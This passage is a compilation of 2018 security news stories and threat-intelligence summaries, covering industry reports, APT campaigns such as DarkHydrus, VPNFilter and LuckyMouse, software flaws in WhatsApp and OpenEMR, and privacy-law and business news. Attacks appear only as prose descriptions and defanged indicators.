The organization says it’s not aware of any instances where this vulnerability has been exploited for malicious purposes. Potentially affected users were notified of the flaw in advance, on July 31.

Reconnaissance, Lateral Movement Soar in Manufacturing Industry
9.8.2018 securityweek ICS

An unusually high volume of malicious internal reconnaissance and lateral movement have been observed in the manufacturing industry, which experts believe is a result of the rapid convergence between IT and OT networks.

The data comes from the 2018 Spotlight Report on Manufacturing released on Wednesday by threat detection company Vectra. The report is based on observations from another report released on Wednesday by the company, the 2018 Black Hat Edition of the Attacker Behavior Industry Report, which shows attacker behavior and trends across nine industries.

The Attacker Behavior Industry Report shows that Vectra has detected a significant number of threats in manufacturing companies. This industry has generated the third highest number of detections, after the education and energy sectors.

Threats by industry per 10,000 host devices

The cybersecurity firm has focused on botnets, command and control (C&C) traffic, data exfiltration, reconnaissance and lateral movement.

In the case of manufacturing organizations, it discovered a significant volume of malicious internal behavior, which suggests that adversaries are already inside the network. For example, Vectra noted that in many instances there was twice as much lateral movement as C&C traffic.

“These behaviors reflect the ease and speed with which attacks can proliferate inside manufacturing networks due to the large volume of unsecured IIoT devices and insufficient internal access controls,” Vectra said in its report. “Most manufacturers do not invest heavily in security access controls for business reasons. These controls can interrupt and isolate manufacturing systems that are critical for lean production lines and digital supply chain processes.”

Many factories connect their industrial internet of things (IIoT) systems to regular computers and enterprise applications for data telemetry and remote management purposes. The use of widely used protocols instead of proprietary protocols makes it easier for malicious actors to infiltrate networks, spy on the targeted organization, and steal data, Vectra said.

According to the company, a recently observed spike in internal reconnaissance in the manufacturing sector was the result of internal darknet scans and SMB account scans. Internal darknet scans are when a device on the network looks for internal IP addresses that do not exist, while SMB account scans occur when a host quickly uses multiple accounts via the SMB protocol.

“Manufacturing networks consist of many gateways that communicate with smart devices and machines. These gateways are connected to each other in a mesh topology to simplify peer-to-peer communication. Cyberattackers leverage the same self-discovery used by peer-to-peer devices to map a manufacturing network in search of critical assets to steal or damage,” Vectra said.

As for lateral movement, the company has seen a wide range of activities, but the most common are SMB brute-force attacks, suspicious Kerberos clients, and automated replication, which occurs when an internal host sends similar payloads to multiple systems on the network.

“IIoT systems make it easy for attackers to move laterally across a manufacturing network, jumping across non-critical and critical subsystems, until they find a way to complete their exploitative missions,” the firm explained.

DarkHydrus Uses Open Source Phishery Tool in Middle-East Attacks
9.8.2018 securityweek

The recently detailed DarkHydrus threat group is leveraging the open-source Phishery tool to create malicious documents used in attacks on government entities in the Middle East, Palo Alto Networks warns.

Just weeks ago, the security firm revealed that the actor is employing numerous free or open-source utilities for their malicious purposes. They have leveraged tools such as Meterpreter, Mimikatz, PowerShellEmpire, Veil, and CobaltStrike, as well as a PowerShell-based backdoor called RogueRobin.

With a focus on credential harvesting, the attacker(s) employs spear-phishing emails to deliver malicious Office documents and is using an infrastructure dating back to fall 2017.

The malicious documents, which use the attachedTemplate technique, load a template from a remote, attacker-controlled location to prompt users to provide login credentials. The login information is then sent to the attacker’s server.

Last year, the FBI and the DHS issued a joint report warning of cyber-attacks targeting energy facilities in the U.S. and elsewhere and leveraging the same template injection technique. Those attacks, however, were attributed to a different actor.

Palo Alto Networks’ security researchers believe that DarkHydrus used the open-source Phishery tool to create two of the Word documents observed in the observed credential harvesting attacks.

One of these attacks was observed on June 24, 2018, targeting an educational institution in the Middle East. The subdomain (of attacker-controlled 0utl00k[.]net) used in this incident was the domain of the targeted educational institution, which made the malicious document and the authentication request look credible.

The security researchers discovered additional documents that employed the same malicious domain for credential harvesting and say that the malicious campaign has been ongoing for almost a year.

Previously, Palo Alto Networks uncovered additional domains the threat actor has been using in assaults, including anyconnect[.]stream, Bigip[.]stream, Fortiweb[.]download, Kaspersky[.]science, microtik[.]stream, owa365[.]bid, symanteclive[.]download, and windowsdefender[.]win.

The RogueRobin backdoor, the security firm says, can determine whether it runs in a sandbox. It provides attackers with various remote administration capabilities, including file upload, PowerShell command, DNS queries, download of content from the command and control (C&C), and the addition of PowerShell modules to the script.The researchers were able to confirm that the Phishery tool was used to create DarkHydrus documents. The open-source utility allows for the injection of remote template URLs into Word documents and is also capable of hosting a C&C server to gather the user-provided credentials.

“We discovered DarkHydrus carrying out credential harvesting attacks that use weaponized Word documents, which they delivered via spear-phishing emails to entities within government and educational institutions. This threat group not only used the Phishery tool to create these malicious Word documents, but also to host the C2 server to harvest credentials,” Palo Alto Networks concluded.

DDoS Attacks Less Frequent But Pack More Punch: Report
8.8.2018 securityweek Attack

There were seven times more distributed denial (DDoS) attacks larger than 300 Gbps (gigabit per second) observed during the first six months of 2018 compared to the first half of 2017, NETSCOUT Arbor reveals.

According to the security company’s latest threat intelligence report, the number of large DDoS attacks jumped from 7 to 47 year-over-year in the first half of 2018, and the average DDoS attack size grow 174% during that period. The overall frequency of attacks, however, went down 13%.

The overall assault size was driven by novel techniques and has seen an increase of 37% since memcached appeared (memcached amplification fueled a 1.7 Tbps attack earlier this year). Between March and June 2018, the number of vulnerable (and accessible) memcached servers dropped from 17,000 to 550.

Although it has been used for reflection/amplification for years, Simple Service Discovery Protocol (SSDP) has received increased attention this year, when it was used to deliver traffic from ephemeral source ports. There are around 33,000 SSDP reflectors that could be abused in attacks, the report reveals (PDF).

The rise of Internet of Things (IoT) devices, most of which lack proper protection, use default credentials and are plagued with both known and unknown software vulnerabilities, is expected to continue to fuel a growth in IoT botnets such as Mirai, which has spawned numerous variants over the past two years.

Attack targets have diversified, with verticals such as finance, gaming, and e-commerce being most likely to be targeted. Telecommunications providers observed the largest number of incidents, and data hosting services were also targeted.

“Today, any organization, for any real or perceived offense or affiliation, can become a target of a DDoS attack,” NETSCOUT Arbor says.

In addition to DDoS attacks, cybercrime and nation-state espionage attacks represent other types of threats posing high risks to organizations and consumers alike.

“Over the past 18 months, internet worms, supply chain attacks, and customer premises equipment (CPE)/IoT compromises have opened up internetscale threat activity. Nation-state APT groups continue to develop globally, used as another means of state-craft and often targeting governments and institutions of geo-strategic relevance,” the report reads.

Targeting newly discovered vulnerabilities in Office, the Iran-based threat actor OilRig has been highly active over the past year. Russian-linked cyber-group Fancy Bear wasn’t dormant either, with the most noteworthy attack recently attributed to it being the VPNFilter malware campaign.

Hidden Cobra, the North Korean threat actor also known as the Lazarus Group, has been observed targeting crypto-currency exchanges, as well as Central and South American banks. Operating out of Vietnam, Ocean Lotus has been actively targeting government and finance sectors over the past year.

The crimeware sector too remains robust and NETSCOUT Arbor expects it to spread beyond its traditional attack methods. There’s an increase in the use of auto-propagation methods, which have already fueled massive malware distribution campaigns such as last year’s WannaCry and NotPetya.

“The hunger for exploitation of new vectors will also continue, as we have seen in the immense DDoS attack impact created by Memcached earlier this year,” NETSCOUT Arbor says.

The security firm also expects an increase in SSDP abuse for internal intrusion, as well as growth in the “use of legitimate software programs by espionage groups and the addition of secondary tactics such as adding crypto-currency mining by crimeware actors.”

Let's Encrypt Now Trusted by All Major Root Programs
8.8.2018 securityweek Safety

Let’s Encrypt root, ISRG Root X1, is now trusted by all major root programs, including Microsoft, Google, Apple, Mozilla, Oracle, and Blackberry.

Let’s Encrypt is a free, automated, and open Certificate Authority (CA) backed by the Linux Foundation that provides website owners with free digital certificates for their sites and handles the certificate management process for them.

Launched by the Internet Security Research Group (ISRG) as an effort to drive HTTPS adoption, the initiative was launched publicly in December 2015 and came out of beta in April 2016.

At the end of July 2018, Let’s Encrypt received direct trust from Microsoft products, which resulted in it being trusted by all major root programs. The CA’s certificates are cross-signed by IdenTrust, and have been widely trusted since the beginning.

“Browsers and operating systems have not, by default, directly trusted Let’s Encrypt certificates, but they trust IdenTrust, and IdenTrust trusts us, so we are trusted indirectly. IdenTrust is a critical partner in our effort to secure the Web, as they have allowed us to provide widely trusted certificates from day one,” noted Josh Aas, Executive Director of ISRG.

Now, the CA’s root is directly trusted by almost all newer versions of operating systems, browsers, and devices. Many older versions, however, still do not directly trust Let’s Encrypt.

While some of these are expected to be updated to trust the CA, others won’t, and it might take at least five more years until most of them cycle out of the Web ecosystem. Until that happens, Let’s Encrypt will continue to use a cross signature.

“Let’s Encrypt is currently providing certificates for more than 115 million websites. We look forward to being able to serve even more websites as efforts like this make deploying HTTPS with Let’s Encrypt even easier,” Aas concludes.

Researchers Find Flaw in WhatsApp
8.8.2018 securityweek

Researchers at Israeli cybersecurity firm CheckPoint said Wednesday they had found a flaw in WhatsApp that could allow hackers to modify and send fake messages in the popular social messaging app.

CheckPoint said the vulnerability gives a hacker the possibility "to intercept and manipulate messages sent by those in a group or private conversation" as well as "create and spread misinformation".

The report of the flaw comes as the Facebook-owned is coming under increasing scrutiny as a means of spreading misinformation due to its popularity and convenience for forwarding messages to groups.

Last month, the app announced limits of forwarding messages following threats by the Indian government to take action after more than 20 people were butchered by crazed mobs after being accused of child kidnapping and other crimes in viral messages circulated wildly on WhatsApp.

WhatsApp said in a statement: "We carefully reviewed this issue and it's the equivalent of altering an email to make it look like something a person never wrote."

However, WhatsApps said: "This claim has nothing to do with the security of end-to-end encryption, which ensures only the sender and recipient can read messages sent on WhatsApp."

The app noted it recently placed a limit on forwarding content, added a label to forwarded messages, and made a series of changes to group chats in order to tackle the challenge of misinformation.

Founded in 2009 and purchased by Facebook in 2014, WhatsApp said that at the beginning of the year it had more than 1.5 billion users who exchanged 65 billion messages per day.

NERC Names Bill Lawrence as VP, Chief Security Officer
8.8.2018 securityweek Security

North American Electric Reliability Corporation (NERC) on Tuesday announced that Bill Lawrence has been named vice president and chief security officer (CSO), and will officially step into the lead security role on August 16, 2018.

In his new role, Lawrence will be tasked with heading NERC's security programs executed through the Electricity Information Sharing and Analysis Center (E-ISAC), where he currently serves as senior director. He will also be responsible for directing security risk assessments and mitigation initiatives to protect critical electricity infrastructure across North America, the regulatory authority said.

ICS Cyber Security Conference

As VP and CSO, Lawrence will also lead coordination efforts with government agencies and stakeholders on cyber and physical security matters, including analysis, response and sharing of critical sector information, NERC said.

Lawrence joined NERC in July 2012 and has directed the development of NERC’s grid security exercise, GridEx.

A not-for-profit international regulatory authority formed to reduce risks to the reliability and security of the grid, NERC's jurisdiction includes owners and operators that serve more than 334 million people.

Lawrence is a graduate of the U.S. Naval Academy with a bachelor’s degree in Computer Science, and flew F-14 Tomcats and F/A-18F Super Hornets for the U.S. Navy prior to joining NERC. He holds a master’s degree in International Relations from Auburn Montgomery and a master’s degree in Military Operational Art and Science from the Air Command and Staff College.

NERC is subject to oversight by the Federal Energy Regulatory Commission (FERC) and governmental authorities in Canada.

Enterprises: Someone on Your Security Team is Likely a Grey Hat Hacker
8.8.2018 securityweek Security

Companies Should Not Dismiss a Bit of Grey Hatting by Staff as Just a Form of Letting Off Steam

The cost of cybercrime is normally described as direct costs: the cost of remediation, forensic support, legal costs and compliance fines, etcetera. A new survey has sought to take a slightly different approach, looking at the organizational costs associated with cybercriminal activity.

Sponsored by Malwarebytes, Osterman Research surveyed 900 security professionals during May and June 2018 across five countries: the United States (200), UK (175), Germany (175), Australia (175), and Singapore (175). All respondents were employed either managing or working on cybersecurity issues in an organization of between 200 and 10,000 employees.

The survey (PDF) relates staff salaries, security budgets and remediation costs; and concludes that the average firm employing 2,500 staff in the U.S. can expect to spend more than $2 million per year for cybersecurity-related costs. The amount is lower in the other surveyed countries, but still close to, or above, $1 million per year. Interestingly, the survey took the unusual step to see if there is any correlation in the number of grey hats employed by a firm and the overall cost of cybersecurity.

The basic findings are much as we would expect, and have been confirmed by numerous other research surveys: most companies have been breached; phishing is the most common attack vector; mid-market companies are attacked more frequently than small companies and as frequently as large companies; and attacks occur with alarming frequency.

The most surprising revelation from this survey is the number of grey hats working within organizations, and black hats that have been employed by organizations. Grey hats are defined as computer security experts who may sometimes violate laws or typical ethical standards, but do not have the full malicious intent associated with a full-time black hat hacker.

Overall, the 900 respondents believe that 4.6 of their colleagues are grey hats -- or, as the report puts it, a full-time security professional that is a black hat on the side. This varies by country: 3.4% in Germany, Australia and Singapore, 5.1% in the U.S., and as much as 7.9% in the UK.

Motivations provided by the respondents include black hat activity being more lucrative (63%), the challenge (50%), retaliation against an employer (40%), philosophical (39%), and, well, it's not really wrong, is it (34%)?

The extent of the income differential between a white hat employee and a black hat hacker is confirmed in a separate report from Bromium, published in April 2018: "High-earning cybercriminals can make $166,000+ per month; Middle-earners can make $75,000+ per month; Low-earners can make $3,500+ per month."

According to the Malwarebytes survey, the highest average starting salary for security professionals (in the U.S.) is $65,578 or just $5,464 per month (compared to $75,000 for middle-earning black hats). The difference is far greater in the UK, where the average starting salary for security professionals is less than $3,000 per month.

"It's interesting," Jerome Segura, lead malware intelligence analyst at Malwarebytes told SecurityWeek: "that despite the skills shortage, when companies hire new security staff, they generally don't pay them very much. There's kind of a contrast here, where companies and governments claim it's difficult to find the right people -- but when they do hire people they don't always pay them accordingly."

There appears to be an inevitable conclusion when correlating figures between the U.S. and the U.K. Not only do the U.S. companies pay their security staff much more than UK companies, they also have a considerably higher security budget ($1,573,197 in the U.S. compared to $350,157 in the UK). Can it be simply coincidence that the UK then has a higher percentage of grey hats within their companies, and that the cost of remediation is proportionately higher (14.7% of the security budget in the U.S., and 17.0% in the UK)?

It makes sense that remediation would take up a higher percentage of a small budget -- and it is tempting to think that the higher rewards of black-hattery would be attractive to lowly paid British staff. The U.S government believes it has found an example in Marcus Hutchins, the British researcher who found and triggered the 'kill-switch' in WannaCry. That was pure white hat behavior -- but Hutchins was later arrested in the US and accused of involvement in making and distributing the Kronos banking malware.

"Hutchins has many who support him," commented Segura, "and many who don't. But given the surprising number of employed white hats who are considered by their peers to be grey hats, it will be interesting to see how this turns out."

Segura accepts that comparatively low pay in the industry could be a partial cause for the surprisingly high number of grey hats working in infosec. He points out that the highest percentage of grey hats appear to work for mid-size companies that cannot afford the highest salaries, and which predominate in the UK. But he does not believe that finance is the only motivating factor. "There is a tricky line in the security profession," he told SecurityWeek. "Some people are pure hackers in the original non-malevolent sense, and they like to poke around to understand things better -- even if it is strictly speaking illegal. It also helps the job -- by peaking behind the curtain you get a better understanding of how the criminals operate and you can better defend against them."

But there's more. "Don't forget the social issues," he added. "Techies can be socially awkward and have difficulty in fitting into a corporate structure. The nerd in his bedroom is a bit of a cliche, but there is some truth to it. Working in a business corporate environment is not for everybody. And in infosec there is a lot of pressure. You can't fit the work into 9-to-5, five days a week -- so people work up to 80 hours or more per week without getting recompensed for it. That's a lot of mental pressure -- there's a lot of burnout in infosec. It's tough, but that's the reality. If you're in infosec, you're on call 24/7."

It would be wrong for companies to dismiss a bit of grey hatting by staff as just a form of letting off steam -- that could prove disastrous. But at the same time, the onus is on the employer to find the solution. Companies probably cannot compete with black hats financially -- but they should do as much as possible to be as inclusive and supportive as possible to the pressures of working in infosec.

New Law May Force Small Businesses to Reveal Data Practices
8.8.2018 securityweek Security

NEW YORK (AP) — A Rhode Island software company that sells primarily to businesses is nonetheless making sure it complies with a strict California law about consumers' privacy.

AVTECH Software is preparing for what some say is the wave of the future: laws requiring businesses to be upfront with customers about how they use personal information. California has already passed a law requiring businesses to disclose what they do with people's personal information and giving consumers more control over how their data is used — even the right to have it deleted from companies' computers.

Privacy rights have gotten more attention since news earlier this year that the data firm Cambridge Analytica improperly accessed Facebook user information. New regulations also took effect in Europe.

For AVTECH, which makes software to control building environmental issues, preparing now makes sense not only to lay the groundwork for future expansion, but to reassure customers increasingly uneasy about what happens to their personal information.

"People will look at who they're dealing with and who they're making purchases from," says Russell Benoit, marketing manager for the Warren, Rhode Island-based company.

Aware that California was likely to enact a data law, AVTECH began reviewing how it handles customer information last year. Although most of the company's customers are businesses, it expects it will increase its sales to consumers.

While it may yet face legal challenges, the California Consumer Privacy Act is set to take effect Jan. 1, 2020. It covers companies that conduct business in California and that fit one of three categories: Those with revenue above $25 million; those that collect or receive the personal information of 50,000 or more California consumers, households or electronic devices; and those who get at least half their revenue from selling personal information.

Although many small businesses may be exempt, those subject to the law will have to ensure their systems and websites can comply with consumer inquiries and requests. That may be an added cost of thousands for small companies that don't have in-house technology staffers and need software and consulting help.

Under California's law, consumers have the right to know what personal information companies collect from them, why it's collected and who the businesses share, transfer or sell it to. That information includes names, addresses, email addresses, browsing histories, purchasing histories, professional or employment information, educational records and information about travel from GPS apps and programs. Companies must give consumers at least two ways to find out their information, including a toll-free phone number and an online form, and companies must also give consumers a copy of the information they've collected.

Consumers also have the right to have their information deleted from companies' computer systems, and to opt out of having the information sold or shared.

The law was modeled on the European Union's General Data Protection Regulation, which took effect May 25. The California Legislature passed its law to prevent a more stringent proposed law from being placed on the November election ballot.

Frank Samson hopes the California law will help prevent what he sees as troubling marketing tactics by some in his industry, taking care of senior citizens. When people inquire about senior care companies online, it's sometimes on sites run by brokers rather than care providers themselves.

"It may be in the fine print, or it may not be: We're going to be taking your info and sending it out to a bunch of people," says Samson, founder of Petaluma, California-based Senior Care Authority.

That steers many would-be clients to just a handful of companies, he says, and can mean seniors and families get bombarded with calls while dealing with stressful situations.

But many unknowns remain about the California law. The state attorney general's office must write regulations to accompany several provisions. There are inconsistencies between different sections of the law, and the Legislature would need to correct them, says Mark Brennan, an attorney with Hogan Lovells in Washington, D.C., who specializes in technology and consumer protection laws. Questions about the law might need to be litigated, including whether California can force businesses based in other states to comply, Brennan says. There are similar questions about the European GDPR.

In the meantime, small business owners who want to start figuring out if they're likely to be subject to the California law and GDPR can talk to attorneys and technology consultants who deal with privacy rights. Brennan suggests companies contact professional and industry organizations that are gathering information about the laws and how to comply.

Some small businesses may benefit, such as any developing software tied to the law. Among other things, the software is designed to allow companies and customers to see what information has been gathered, who has access to it and who it has been shared with.

The software, expected to stay free for consumers, could cost companies into the thousands of dollars a year depending on their size, says Andy Sambandam, CEO of Clarip, one of the software makers. But, he says, "over time, the price is going to come down."

And other states are expected to adopt similar laws.

"This is the direction the country is going in," says Campbell Hutcheson, chief compliance officer with Datto, an information technology firm.

RiskRecon Raises $25 Million to Grow Third-Party Cyber Risk Management Business
8.8.2018 securityweek Cyber

Salk Lake City-based RiskRecon, which offers solutions to help companies manage third-party cyber risk, has raised $25 million in Series B financing, the company announced Wednesday.

The Series B round brings the total amount raised by RiskRecon to more than $40 million.

RiskRecon helps its customers control third-party risk by providing assessments of each third-party’s security practices, which can be used to establish a base level of trust and identify specific areas for further discussion and investigation.

The company, which has nearly tripled its customer base in the last twelve months, says the additional funding will be used to support increasing demand for its third-party cyber risk management solutions.

“Though most businesses have no choice but to obtain internet services, security solutions, and a range of other business-critical technologies from third-party providers, they do have a choice in how they manage the associated security risks,” noted SecurityWeek contributor Josh Lefkowitz in a recent column.

“Third-party risk management is the process of holding enterprises accountable to good security practices,” explained Kelly White, RiskRecon’s CEO and Co-founder. “As you improve the risk management of your third parties, you improve the collective security of the Internet.”

The Series B round was led by Accel and joined by existing investors Dell Technologies Capital, General Catalyst, and Fidelity’s F-Prime Capital. Several existing individual investors also participated in the round.

“As we talk to our CISOs, we see a growing need for third-party risk management as enterprises have become more intertwined with third-party service providers,” said Nate Niparko, a partner at Accel.

“Conducting thorough due diligence on a prospective vendor’s security is essential,” Lefkowitz added in his April 2018 column. “The most secure and successful vendor relationships are rooted in preparation and transparency. Thoroughly understanding all facets of a vendor’s security program, implementing additional controls as needed to appropriately safeguard your business’s assets, and being prepared to respond to future incidents can go a long way toward reducing business risks associated with any vendor relationship.”

Serious OpenEMR Flaws Expose Medical Records
8.8.2018 securityweek

Researchers have discovered nearly two dozen vulnerabilities in the OpenEMR software, including critical flaws that can be exploited to gain unauthorized access to medical records.

OpenEMR is a highly popular open source management software for health records and medical practices. The free application offers a wide range of features and it can run on various operating systems, including Windows, Linux and macOS.

Researchers at Project Insecurity, which provides penetration testing, vulnerability assessment and other cybersecurity services, conducted a detailed analysis of the OpenEMR source code. The analysis was based on manual source code reviews and Burp tests, and it led to the discovery of 23 flaws.Serious flaws found in OpenEMR

Fifteen of the security holes have been rated “high severity.” These include an authentication bypass issue that allows an attacker to access the patient portal, SQL injection flaws, remote command execution bugs, and arbitrary file read/write issues.

The authentication bypass vulnerability can be exploited by an unauthenticated attacker by navigating to the patient registration page and then modifying the URL to access pages that would normally require authentication, including ones storing patient data.

Experts discovered a total of nine SQL injection vulnerabilities, including ones that provide access to databases storing sensitive information. Exploiting the SQL injection flaws requires authentication, but that can be achieved using the aforementioned security bypass.

Four remote command execution flaws have been identified by experts, but they all require authentication, including admin privileges in some cases.

Researchers also found vulnerabilities that can be exploited to upload, read or delete files on the system. Exploitation requires authentication, but their impact can be high.

According to Project Insecurity, OpenEMR is affected by several cross-site request forgery (CSRF) vulnerabilities. In some cases, these flaws can be exploited to escalate privileges and execute arbitrary code if the attacker can convince an administrator to click on a malicious link.

The other vulnerabilities discovered by Project Insecurity include unrestricted file upload, information disclosure and other issues classified as medium or low severity.

Project Insecurity has published a 28-page report detailing each of the flaws, including impact, cause, and proof-of-concept (PoC) code. The report also shares recommendations on how the security holes can be addressed.

The vulnerabilities were reported to OpenEMR developers on July 7 and patches were rolled out for all the bugs within roughly two weeks.

IT threat evolution Q2 2018
8.8.2018 Kaspersky CyberSpy

Targeted attacks and malware campaigns
Operation Parliament
In April, we reported the workings of Operation Parliament, a cyber-espionage campaign aimed at high-profile legislative, executive and judicial organizations around the world – with its main focus in the MENA (Middle East and North Africa) region, especially Palestine. The attacks, which started early in 2017, target parliaments, senates, top state offices and officials, political science scholars, military and intelligence agencies, ministries, media outlets, research centers, election commissions, Olympic organizations, large trading companies and others.

The attackers have taken great care to stay under the radar, imitating another attack group in the region. The targeting of victims is unlike that of previous campaigns in the Middle East, by Gaza Cybergang or Desert Falcons, and points to an elaborate information-gathering exercise that was carried out prior to the attacks (physical and/or digital). The attackers have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their C2 (Command-and-Control) servers. The attacks seem to have slowed down since the start of 2018, probably after the attackers achieved their objectives.

The malware basically provides a remote CMD/PowerShell terminal for the attackers, enabling them to execute any scripts or commands and receive the result via HTTP requests.

This campaign is a further symptom of escalating tensions in the Middle East.

Energetic Bear
Crouching Yeti (aka Energetic Bear) is an APT group that has been active since at least 2010, mainly targeting energy and industrial companies. The group targets organizations around the world, but with a particular focus on Europe, the US and Turkey – the latter being a new addition to the group’s interests during 2016-17. The group’s main tactics include sending phishing e-mails with malicious documents and infecting servers for different purposes, including hosting tools and logs and watering-hole attacks. Crouching Yeti’s activities against US targets have been publicly discussed by US-CERT and the UK National Cyber Security Centre (NCSC).

In April, Kaspersky Lab ICS CERT provided information on identified servers infected and used by Crouching Yeti and presented the findings of an analysis of several web servers compromised by the group during 2016 and early 2017.

Our findings are as follows.

With rare exceptions, the group’s members get by with publicly available tools. The use of publicly available utilities by the group to conduct its attacks renders the task of attack attribution without any additional group ‘markers’ very difficult.
Potentially, any vulnerable server on the internet is of interest to the attackers when they want to establish a foothold in order to develop further attacks against target facilities.
In most cases that we have observed, the group performed tasks related to searching for vulnerabilities, gaining persistence on various hosts, and stealing authentication data.
The diversity of victims may indicate the diversity of the attackers’ interests.
It can be assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it, performing initial data collection, the theft of authentication data and gaining persistence on resources that are suitable for the attack’s further development.
You can read the full report here.

The use of mobile platforms for cyber-espionage has been growing in recent years – not surprising, given the widespread use of mobile devices by businesses and consumers alike. ZooPark is one such operation. The attackers have been focusing on targets in the Middle East since at least June 2015, using several generations of malware to target Android devices, which we have labelled versions one to four.

Each version marks a progression – from very basic first and second versions, to the commercial spyware fork in the third version and then to the complex spyware that is the fourth version. The last step is especially interesting, showing a big leap from straightforward code functionality to highly sophisticated malware.

This suggests that the latest version may have been bought from a vendor of specialist surveillance tools. This wouldn’t be surprising, since the market for these espionage tools is growing, becoming popular among governments, with several known cases in the Middle East. At this point, we cannot confirm attribution to any known threat actor. If you would like to learn more about our intelligence reports, or request more information on a specific report, contact us at intelreports@kaspersky.com.

We have seen two main distribution vectors for ZooPark – Telegram channels and watering-holes. The second of these has been the preferred method: we found several news websites that have been hacked by the attackers to redirect visitors to a downloading site that serves malicious APKs. Some of the themes observed in the campaign include ‘Kurdistan referendum’, ‘TelegramGroups’ and ‘Alnaharegypt news’, among others.

The target profile has evolved in the last few years of the campaign, focusing on victims in Egypt, Jordan, Morocco, Lebanon and Iran.

Some of the samples we have analyzed provide clues about the intended targets. For example, one sample mimics a voting application for the independence referendum in Kurdistan. Other possible high-profile targets include the United Nations Relief and Works Agency (UNRWA) for Palestine refugees in the Near East in Amman, Jordan.

The king is dead, long live the king!
On April 18, someone uploaded an interesting exploit to VirusTotal. This was detected by several security vendors, including Kaspersky Lab – using our generic heuristic logic for some older Microsoft Word documents.

This turned out to be a new zero-day vulnerability for Internet Explorer (CVE-2018-8174) –patched by Microsoft on May 8, 2018. Following processing of the sample in our sandbox system, we noticed that it successfully exploited a fully patched version of Microsoft Word. This led us to carry out a deeper analysis of the vulnerability.

The infection chain consists of the following steps. The victim receives a malicious Microsoft Word document. After opening it, the second stage of the exploit is downloaded – an HTML page containing VBScript code. This triggers a UAF (Use After Free) vulnerability and executes shellcode.

Despite the initial attack vector being a Word document, the vulnerability is actually in VBScript. This is the first time we have seen a URL Moniker used to load an IE exploit in Word, but we believe that this technique will be heavily abused by attackers in the future, since it allows them to force victims to load IE, ignoring the default browser settings. It’s likely that exploit kit authors will start abusing it in both drive-by attacks (through the browser) and spear-phishing campaigns (through a document).

To protect against this technique, we would recommend applying the latest security updates and using a security solution with behavior detection capabilities.

In May, researchers from Cisco Talos published the results of their investigation into VPNFilter, malware used to infect different brands of routers – mainly in Ukraine, although affecting routers in 54 countries in total. Initially, they believed that the malware had infected around 500,000 routers – Linksys, MikroTik, Netgear and TP-Link networking equipment in the small office/home office (SOHO) sector, and QNAP network-attached storage (NAS) devices. However, it later became clear that the list of infected routers was much longer – 75 in total, including ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE.

The malware is capable of bricking the infected device, executing shell commands for further manipulation, creating a TOR configuration for anonymous access to the device or configuring the router’s proxy port and proxy URL to manipulate browsing sessions.

Further research by Cisco Talos showed that the malware is able to infect more than just targeted devices. It is also spread into networks supported by the device, thereby extending the scope of the attack. Researchers also identified a new stage-three module capable of injecting malicious code into web traffic.

The C2 mechanism has several stages. First, the malware tries to visit a number of gallery pages hosted on ‘photobucket[.]com’ and fetches the image from the page. If this fails, the malware tries to fetch an image from the hard-coded domain ‘toknowall[.]com’ (this C2 domain is currently sink-holed by the FBI). If this fails also, the malware goes into passive backdoor mode, in which it processes network traffic on the infected device, waiting for the attacker’s commands. Researchers in the Global Research and Analysis Team (GReAT) at Kaspersky Lab analyzed the EXIF processing mechanism.

One of the interesting questions is who is behind this malware. Cisco Talos indicated that a state-sponsored or state affiliated threat actor is responsible. In its affidavit for sink-holing the C2, the FBI suggests that Sofacy (aka APT28, Pawn Storm, Sednit, STRONTIUM, and Tsar Team) is the culprit. There is some code overlap with the BlackEnergy malware used in previous attacks in Ukraine (the FBI’s affidavit makes it clear that they see BlackEnergy (aka Sandworm) as a sub-group of Sofacy).

In March 2018, we detected an ongoing campaign targeting a national data center in Central Asia. The choice of target of the campaign, which has been active since autumn 2017, is especially significant – it means that the attackers were able to gain access to a wide range of government resources in one fell swoop. We think they did this by inserting malicious scripts into the country’s official websites in order to conduct watering-hole attacks.

We attribute this campaign to the Chinese-speaking threat actor LuckyMouse (aka EmissaryPanda and APT27) because of the tools and tactics used in the campaign, because the C2 domain, update.iaacstudio[.]com, was previously used by this group and because they have previously targeted government organizations, including those in Central Asia.

The initial infection vector used in the attack against the data centre is unclear. Even where we observed LuckyMouse using weaponized documents with CVE-2017-118822 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we couldn’t prove that they were related to this particular attack. It’s possible that the attackers used a watering hole to infect data center employees.

The attackers used the HyperBro Trojan as their last-stage, in-memory remote administration tool (RAT) and their anti-detection launcher and decompressor makes extensive use of the Metasploit ‘shikata_ga_nai’ encoder as well as LZNT1 compression.

The main C2 used in this campaign is bbs.sonypsps[.]com, which resolved to an IP address that belongs to a Ukrainian ISP network, held by a MikroTik router using version 6.34.4 (March 2016) of the firmware with SMBv1 on board. We suspect that this router was hacked as part of the campaign in order to process the malware’s HTTP requests.

The initial module drops three files that are typical for Chinese-speaking threat actors – a legitimate Symantec pcAnywhere file (‘intgstat.exe’) for DLL side-loading, a DLL launcher (‘pcalocalresloader.dll’) and the last-stage decompressor (‘thumb.db’). As a result of all these steps, the last-stage Trojan is injected into the process memory of ‘svchost.exe’.

The launcher module, obfuscated with the notorious Metasploit ‘shikata_ga_nai’ encoder, is the same for all the droppers. The resulting de-obfuscated code performs typical side-loading: it patches the pcAnywhere image in memory at its entry-point. The patched code jumps back to the second ‘shikata_ga_nai’ iteration of the decryptor, but this time as part of the white-listed application.

The Metasploit encoder obfuscates the last part of the launcher’s code, which in turn resolves the necessary API and maps ‘thumb.db’ into the memory of the same process (i.e. pcAnywhere). The first instructions in the mapped ‘thumb.db’ are for a new iteration of ‘shikata_ga_nai’. The decrypted code resolves the necessary API functions, decompresses the embedded PE file with ‘RtlCompressBuffer()’ using LZNT1 and maps it into memory.

Olympic Destroyer
In our first report on Olympic Destroyer, the cyberattack on the PyeongChang Winter Olympics, we highlighted a specific spear-phishing attack as the initial infection vector. The threat actor sent weaponized documents, disguised as Olympic-related content, to relevant persons and organizations.

We have continued to track this APT group’s activities and recently noticed that they have started a new campaign with a different geographical distribution and using new themes. Our telemetry, and the characteristics of the spear-phishing documents we have analysed, indicate that the attackers behind Olympic Destroyer are now targeting financial and biotechnology-related organizations based in Europe – specifically, Russia, the Netherlands, Germany, Switzerland and Ukraine.

The group continues to use a non-executable infection vector and highly obfuscated scripts to evade detection.

